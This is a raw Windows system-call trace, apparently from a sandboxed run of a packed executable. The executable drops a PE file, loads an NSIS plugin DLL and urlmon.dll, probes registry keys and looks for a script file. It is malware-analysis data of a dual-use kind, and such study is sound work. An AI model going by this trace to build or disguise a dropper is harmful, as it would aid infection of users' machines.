c\331\200d\221\332`\20\2261\324v\15\30\214q053|4\376P2\260\274(Mv\333ms\332&!.i\273g\263\375\312\311G\223Pa\21\3!\311Bh\202\203\223\306\20\232\216:\20\234\342b\31\34f\357}#\3iz\272\273?v\317\236=\253s\336\274\367\356\275\357\275\373\356\275\357\336\373fT\261\372qF\3170\214\1\212\2522\314\313\214\366+a\376\343_?\224\264\251\277Ic^H|{\332\313\272\362\267\247\255l\332\264-kk[\353\306\266\206\7\263\3265l\331\322\312g\255m\314j\23\266dm\332\222\265x\2317\353\301\326\365\215sSS\223\262cs,\370\356\346+\273\206\343\17\214\227\346\261U\7\36\202\372*\324\355\24f8\320\14\265x\302E\373\355\321\15\7:h]s`'\255\353i\275b\323\272&\34?\316[\245\213a\312u\6f\312g\241\33[\31d\322\246%\353\22\222\230)\3201i\260\223\367\302\303\14\305J\273f\332\216\323\344\30107k\346\337;q1RJ{\243\326\252\307m\14\363\14\324\337\201\371*\377\236\360\0\371/:\346\277\376\203yW\375\35\364\\276q'\17\365G\223c\14M\271u\23\332/\13v3\267m}\3\337\0\323\351c{G\232\273\276L\7\202+\231\253\2211\5\177\307(\0\34\232\333\326\330\322\272\216ad\235\2667*\244\273\277B\267\220\371\377\337\377\252\37Y\234m\352\311-a\314\3200\367X\241!7\203)\4B\202\276RI\252l.Q\323\301<\314\225\362C\0\255\11W\221\13\304\225\242\15pY|\325t\4\247\312\7A\355d(p\205o\360\27\317\363\12\23\203n\35\14\1\33\250!Qy2\14U\22|\362f\332", ) , ) == 0x0
 00952   456   NtWriteFile  (12, 0, 0, 0,  (12, 0, 0, 0, "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\330\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\0=\225k\366y\364\5\245y\364\5\245y\364\5\245j\374X\245{\364\5\245\372\374X\245|\364\5\245y\364\4\245j\364\5\245\203\320E\245|\364\5\245|\370f\245}\364\5\245|\370Y\245x\364\5\245|\370_\245x\364\5\245Richy\364\5\245\0\0\0\0\0\0\0\0PE\0\0L\1\4\0\32\356\300@\0\0\0\0\0\0\0\0\340\0\16!\13\1\7\12\0\32\0\0\0\10\0\0\0\0\0\0\321'\0\0\0\20\0\0\00\0\0\0\0\0\20\0\20\0\0\0\2\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0`\0\0\0\4\0\0\0\0\0\0\2\0\0\0\0\0\20\0\0\20\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\2202\0\0\240\0\0\0\2240\0\0P\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0P\0\0\254\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\0\0X\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0.text\0\0\0\335\31\0\0\0\20\0\0\0\32\0\0\0\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 9216, 0x0, 0, ... {status=0x0, info=9216}, ) , 9216, 0x0, 0, ... {status=0x0, info=9216}, ) == 0x0
 00953   456   NtClose  (12, ... ) == 0x0
 00954   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00955   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00956   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242296, ... ) }, 1242296, ... ) == 0x0
 00957   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 5, 96, ... 12, {status=0x0, info=1}, ) }, 5, 96, ... 12, {status=0x0, info=1}, ) == 0x0
 00958   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 12, ... 80, ) == 0x0
 00959   456   NtClose  (12, ... ) == 0x0
 00960   456   NtMapViewOfSection  (80, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x880000), 0x0, 12288, ) == 0x0
 00961   456   NtClose  (80, ... ) == 0x0
 00962   456   NtUnmapViewOfSection  (-1, 0x880000, ... ) == 0x0
 00963   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242224, ... ) }, 1242224, ... ) == 0x0
 00964   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 5, 96, ... 80, {status=0x0, info=1}, ) }, 5, 96, ... 80, {status=0x0, info=1}, ) == 0x0
 00965   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 80, ... 12, ) == 0x0
 00966   456   NtClose  (80, ... ) == 0x0
 00967   456   NtMapViewOfSection  (12, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0x880000), 0x0, 12288, ) == 0x0
 00968   456   NtClose  (12, ... ) == 0x0
 00969   456   NtUnmapViewOfSection  (-1, 0x880000, ... ) == 0x0
 00970   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242540, ... ) }, 1242540, ... ) == 0x0
 00971   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1242540, ... ) }, 1242540, ... ) == 0x0
 00972   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 5, 96, ... 12, {status=0x0, info=1}, ) }, 5, 96, ... 12, {status=0x0, info=1}, ) == 0x0
 00973   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 12, ... 80, ) == 0x0
 00974   456   NtQuerySection  (80, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 00975   456   NtClose  (12, ... ) == 0x0
 00976   456   NtMapViewOfSection  (80, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x10000000), 0x0, 24576, ) == 0x0
 00977   456   NtClose  (80, ... ) == 0x0
 00978   456   NtProtectVirtualMemory  (-1, (0x10003000), 88, 4, ... (0x10003000), 4096, 2, ) == 0x0
 00979   456   NtProtectVirtualMemory  (-1, (0x10003000), 4096, 2, ... (0x10003000), 4096, 4, ) == 0x0
 00980   456   NtFlushInstructionCache  (-1, 268447744, 88, ... ) == 0x0
 00981   456   NtProtectVirtualMemory  (-1, (0x10003000), 88, 4, ... (0x10003000), 4096, 2, ) == 0x0
 00982   456   NtProtectVirtualMemory  (-1, (0x10003000), 4096, 2, ... (0x10003000), 4096, 4, ) == 0x0
 00983   456   NtFlushInstructionCache  (-1, 268447744, 88, ... ) == 0x0
 00984   456   NtProtectVirtualMemory  (-1, (0x10003000), 88, 4, ... (0x10003000), 4096, 2, ) == 0x0
 00985   456   NtProtectVirtualMemory  (-1, (0x10003000), 4096, 2, ... (0x10003000), 4096, 4, ) == 0x0
 00986   456   NtFlushInstructionCache  (-1, 268447744, 88, ... ) == 0x0
 00987   456   NtProtectVirtualMemory  (-1, (0x10004008), 4, 64, ... (0x10004000), 4096, 4, ) == 0x0
 00988   456   NtAllocateVirtualMemory  (-1, 1363968, 0, 8192, 4096, 4, ... 1363968, 8192, ) == 0x0
 00989   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "TTC.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00990   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\TTC.dll"}, 1242400, ... ) }, 1242400, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00991   456   NtQueryAttributesFile  ({24, 84, 0x40, 0, 0,  ({24, 84, 0x40, 0, 0, "TTC.dll"}, 1242400, ... ) }, 1242400, ... ) == 0x0
 00992   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\TTC.dll"}, 5, 96, ... 80, {status=0x0, info=1}, ) }, 5, 96, ... 80, {status=0x0, info=1}, ) == 0x0
 00993   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 80, ... 12, ) == 0x0
 00994   456   NtQuerySection  (12, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 00995   456   NtClose  (80, ... ) == 0x0
 00996   456   NtMapViewOfSection  (12, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x900000), 0x0, 172032, ) == STATUS_IMAGE_NOT_AT_BASE
 00997   456   NtProtectVirtualMemory  (-1, (0x901000), 114688, 4, ... (0x901000), 114688, 32, ) == 0x0
 00998   456   NtProtectVirtualMemory  (-1, (0x91d000), 24576, 4, ... (0x91d000), 24576, 2, ) == 0x0
 00999   456   NtProtectVirtualMemory  (-1, (0x927000), 4096, 4, ... (0x927000), 4096, 2, ) == 0x0
 01000   456   NtProtectVirtualMemory  (-1, (0x928000), 8192, 4, ... (0x928000), 8192, 2, ) == 0x0
 01001   456   NtMapViewOfSection  (12, -1, (0x900000), 0, 0, 0x0, 172032, 1, 0, 4, ... ) == STATUS_CONFLICTING_ADDRESSES
 01002   456   NtProtectVirtualMemory  (-1, (0x901000), 114688, 16, ... (0x901000), 114688, 4, ) == 0x0
 01003   456   NtProtectVirtualMemory  (-1, (0x91d000), 24576, 2, ... (0x91d000), 24576, 4, ) == 0x0
 01004   456   NtProtectVirtualMemory  (-1, (0x927000), 4096, 2, ... (0x927000), 4096, 8, ) == 0x0
 01005   456   NtProtectVirtualMemory  (-1, (0x928000), 8192, 2, ... (0x928000), 8192, 8, ) == 0x0
 01006   456   NtFlushInstructionCache  (-1, 0, 0, ... ) == 0x0
 01007   456   NtClose  (12, ... ) == 0x0
 01008   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "urlmon.dll"}, ... 12, ) }, ... 12, ) == 0x0
 01009   456   NtMapViewOfSection  (12, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x760f0000), 0x0, 491520, ) == 0x0
 01010   456   NtClose  (12, ... ) == 0x0
 01011   456   NtProtectVirtualMemory  (-1, (0x91d000), 600, 4, ... (0x91d000), 4096, 2, ) == 0x0
 01012   456   NtProtectVirtualMemory  (-1, (0x91d000), 4096, 2, ... (0x91d000), 4096, 4, ) == 0x0
 01013   456   NtFlushInstructionCache  (-1, 9555968, 600, ... ) == 0x0
 01014   456   NtProtectVirtualMemory  (-1, (0x91d000), 600, 4, ... (0x91d000), 4096, 2, ) == 0x0
 01015   456   NtProtectVirtualMemory  (-1, (0x91d000), 4096, 2, ... (0x91d000), 4096, 4, ) == 0x0
 01016   456   NtFlushInstructionCache  (-1, 9555968, 600, ... ) == 0x0
 01017   456   NtProtectVirtualMemory  (-1, (0x91d000), 600, 4, ... (0x91d000), 4096, 2, ) == 0x0
 01018   456   NtProtectVirtualMemory  (-1, (0x91d000), 4096, 2, ... (0x91d000), 4096, 4, ) == 0x0
 01019   456   NtFlushInstructionCache  (-1, 9555968, 600, ... ) == 0x0
 01020   456   NtProtectVirtualMemory  (-1, (0x91d000), 600, 4, ... (0x91d000), 4096, 2, ) == 0x0
 01021   456   NtProtectVirtualMemory  (-1, (0x91d000), 4096, 2, ... (0x91d000), 4096, 4, ) == 0x0
 01022   456   NtFlushInstructionCache  (-1, 9555968, 600, ... ) == 0x0
 01023   456   NtProtectVirtualMemory  (-1, (0x91d000), 600, 4, ... (0x91d000), 4096, 2, ) == 0x0
 01024   456   NtProtectVirtualMemory  (-1, (0x91d000), 4096, 2, ... (0x91d000), 4096, 4, ) == 0x0
 01025   456   NtFlushInstructionCache  (-1, 9555968, 600, ... ) == 0x0
 01026   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "OLEAUT32.dll"}, ... 12, ) }, ... 12, ) == 0x0
 01027   456   NtMapViewOfSection  (12, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77120000), 0x0, 569344, ) == 0x0
 01028   456   NtClose  (12, ... ) == 0x0
 01029   456   NtProtectVirtualMemory  (-1, (0x91d000), 600, 4, ... (0x91d000), 4096, 2, ) == 0x0
 01030   456   NtProtectVirtualMemory  (-1, (0x91d000), 4096, 2, ... (0x91d000), 4096, 4, ) == 0x0
 01031   456   NtFlushInstructionCache  (-1, 9555968, 600, ... ) == 0x0
 01032   456   NtProtectVirtualMemory  (-1, (0x91d000), 600, 4, ... (0x91d000), 4096, 2, ) == 0x0
 01033   456   NtProtectVirtualMemory  (-1, (0x91d000), 4096, 2, ... (0x91d000), 4096, 4, ) == 0x0
 01034   456   NtFlushInstructionCache  (-1, 9555968, 600, ... ) == 0x0
 01035   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01036   456   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 8912896, 65536, ) == 0x0
 01037   456   NtAllocateVirtualMemory  (-1, 8912896, 0, 4096, 4096, 4, ... 8912896, 4096, ) == 0x0
 01038   456   NtAllocateVirtualMemory  (-1, 8916992, 0, 8192, 4096, 4, ... 8916992, 8192, ) == 0x0
 01039   456   NtCreateMutant  (0x1f0001, {24, 64, 0x80, 0, 0,  (0x1f0001, {24, 64, 0x80, 0, 0, "ZonesCounterMutex"}, 0, ... 12, ) }, 0, ... 12, ) == 0x0
 01040   456   NtCreateMutant  (0x1f0001, {24, 64, 0x80, 0, 0,  (0x1f0001, {24, 64, 0x80, 0, 0, "ZonesCacheCounterMutex"}, 0, ... 80, ) }, 0, ... 80, ) == 0x0
 01041   456   NtQueryDefaultUILanguage  (1240616, ...
 01042   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01043   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... -2147482028, ) == 0x0
 01044   456   NtQueryInformationToken  (-2147482028, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01045   456   NtClose  (-2147482028, ... ) == 0x0
 01046   456   NtOpenKey  (0x2000000, {24, 0, 0x640, 0, 0,  (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003"}, ... -2147482028, ) }, ... -2147482028, ) == 0x0
 01047   456   NtOpenKey  (0x80000000, {24, 0, 0x240, 0, 0,  (0x80000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01048   456   NtOpenKey  (0x80000000, {24, -2147482028, 0x640, 0, 0,  (0x80000000, {24, -2147482028, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147482020, ) }, ... -2147482020, ) == 0x0
 01049   456   NtQueryValueKey  (-2147482020,  (-2147482020, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01050   456   NtClose  (-2147482020, ... ) == 0x0
 01051   456   NtClose  (-2147482028, ... ) == 0x0
 01041   456   NtQueryDefaultUILanguage  ... ) == 0x0
 01052   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\Nls\MUILanguages"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01053   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\urlmon.dll"}, 1, 96, ... 88, {status=0x0, info=1}, ) }, 1, 96, ... 88, {status=0x0, info=1}, ) == 0x0
 01054   456   NtCreateSection  (0x4, 0x0, 0x0, 2, 134217728, 88, ... 92, ) == 0x0
 01055   456   NtMapViewOfSection  (92, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 2, ... (0x930000), 0x0, 454656, ) == 0x0
 01056   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\urlmon.dll.123.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01057   456   NtQueryDefaultLocale  (1, 1238652, ... ) == 0x0
 01058   456   NtOpenFile  (0x1200a9, {24, 0, 0x40, 0, 0,  (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\urlmon.dll.123.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01059   456   NtRequestWaitReplyPort  (24, {128, 156, new_msg, 0, 1239508, 1, 96, 0}  (24, {128, 156, new_msg, 0, 1239508, 1, 96, 0} "\210\6\31\1\33\0\1\0\0\0\0\0\1\355\22\0\1\0\0\0\0\0\11\4\1\1\1\0<\0@\0\250\6\31\1X\0\0\0\377\377\377\377\0\0\0\0\240\302\230\0\0\0\0\0\303\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\324\360\22\0\0\0\0\0" ... {128, 156, reply, 0, 452, 456, 1527, 0} "(\350\26\0\33\0\1\0\0\0\0\0\1\355\22\0\1\0\0\0\0\0\11\4\1\1\1\0<\0@\0\250\6\31\1X\0\0\0\377\377\377\377\0\0\0\0\240\302\230\0\0\0\0\0\303\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\324\360\22\0\0\0\0\0" )  ... {128, 156, reply, 0, 452, 456, 1527, 0}  (24, {128, 156, new_msg, 0, 1239508, 1, 96, 0} "\210\6\31\1\33\0\1\0\0\0\0\0\1\355\22\0\1\0\0\0\0\0\11\4\1\1\1\0<\0@\0\250\6\31\1X\0\0\0\377\377\377\377\0\0\0\0\240\302\230\0\0\0\0\0\303\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\324\360\22\0\0\0\0\0" ... {128, 156, reply, 0, 452, 456, 1527, 0} "(\350\26\0\33\0\1\0\0\0\0\0\1\355\22\0\1\0\0\0\0\0\11\4\1\1\1\0<\0@\0\250\6\31\1X\0\0\0\377\377\377\377\0\0\0\0\240\302\230\0\0\0\0\0\303\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6\31\1\0\0\0\0\0\0\0\0\324\360\22\0\0\0\0\0" )  ) == 0x0
 01060   456   NtClose  (88, ... ) == 0x0
 01061   456   NtClose  (92, ... ) == 0x0
 01062   456   NtUnmapViewOfSection  (-1, 0x930000, ... ) == 0x0
 01063   456   NtUnmapViewOfSection  (-1, 0x12f0d4, ... ) == STATUS_NOT_MAPPED_VIEW
 01064   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01065   456   NtOpenKey  (0x8, {24, 0, 0x40, 0, 0,  (0x8, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01066   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01067   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01068   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local\"}, 1237192, ... ) }, 1237192, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01069   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01070   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01071   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01072   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a"}, 1237784, ... ) }, 1237784, ... ) == 0x0
 01073   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a"}, 3, 33, ... 92, {status=0x0, info=1}, ) }, 3, 33, ... 92, {status=0x0, info=1}, ) == 0x0
 01074   456   NtQueryDebugFilterState  (53, 2, ... ) == 0x0
 01075   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01076   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 01077   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01078   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01079   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 88, ) == 0x0
 01080   456   NtQueryInformationToken  (88, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01081   456   NtClose  (88, ... ) == 0x0
 01082   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes"}, ... 88, ) }, ... 88, ) == 0x0
 01083   456   NtSetInformationObject  (90, Handle, {Inherit=0,ProtectFromClose=1,}, 1179904, ... ) == 0x0
 01084   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 01085   456   NtOpenKey  (0x2000000, {24, 90, 0x40, 0, 0,  (0x2000000, {24, 90, 0x40, 0, 0, "PROTOCOLS\Name-Space Handler\"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01086   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\PROTOCOLS\Name-Space Handler"}, ... 96, ) }, ... 96, ) == 0x0
 01087   456   NtQueryKey  (98, Name, 392, ... {Name= (98, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\PROTOCOLS\Name-Space HandlerS"}, 130, ) }, 130, ) == 0x0
 01088   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 01089   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 100, ) == 0x0
 01090   456   NtQueryInformationToken  (100, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 01091   456   NtClose  (100, ... ) == 0x0
 01092   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\PROTOCOLS\Name-Space Handler"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01093   456   NtEnumerateKey  (98, 0, Node, 288, ... {LastWrite={0x5d796f8c,0x1c73999}, TitleIdx=0, Name= (98, 0, Node, 288, ... {LastWrite={0x5d796f8c,0x1c73999}, TitleIdx=0, Name="mk", Class=""}, 28, ) , Class=""}, 28, ) == 0x0
 01094   456   NtEnumerateKey  (98, 1, Node, 288, ... ) == STATUS_NO_MORE_ENTRIES
 01095   456   NtClose  (98, ... ) == 0x0
 01096   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01097   456   NtOpenKey  (0x1, {24, 52, 0x40, 0, 0,  (0x1, {24, 52, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01098   456   NtUserRegisterWindowMessage  ( ("{FB8F0821-0164-101B-84ED-08002B2EC713}", ... ) , ... ) == 0xc07b
 01099   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\OLEAUT"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01100   456   NtOpenKey  (0x9, {24, 48, 0x40, 0, 0,  (0x9, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\OLEAUT\UserEra"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01101   456   NtOpenKey  (0x1, {24, 48, 0x40, 0, 0,  (0x1, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\OLEAUT"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01102   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 01103   456   NtAllocateVirtualMemory  (-1, 0, 0, 65536, 8192, 4, ... 9633792, 65536, ) == 0x0
 01104   456   NtAllocateVirtualMemory  (-1, 9633792, 0, 4096, 4096, 4, ... 9633792, 4096, ) == 0x0
 01105   456   NtAllocateVirtualMemory  (-1, 9637888, 0, 8192, 4096, 4, ... 9637888, 8192, ) == 0x0
 01106   456   NtAllocateVirtualMemory  (-1, 9646080, 0, 4096, 4096, 4, ... 9646080, 4096, ) == 0x0
 01107   456   NtQueryPerformanceCounter  (... {115355930, 0}, {3579545, 0}, ) == 0x0
 01108   456   NtAllocateVirtualMemory  (-1, 9650176, 0, 4096, 4096, 4, ... 9650176, 4096, ) == 0x0
 01109   456   NtUnmapViewOfSection  (-1, 0x10000000, ... ) == 0x0
 01110   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 01111   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 01112   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Program Files\folder.js"}, 1244456, ... ) }, 1244456, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01113   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\folder.js"}, 7, 2113568, ... ) }, 7, 2113568, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01114   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Program Files\folder.js"}, 1244440, ... ) }, 1244440, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
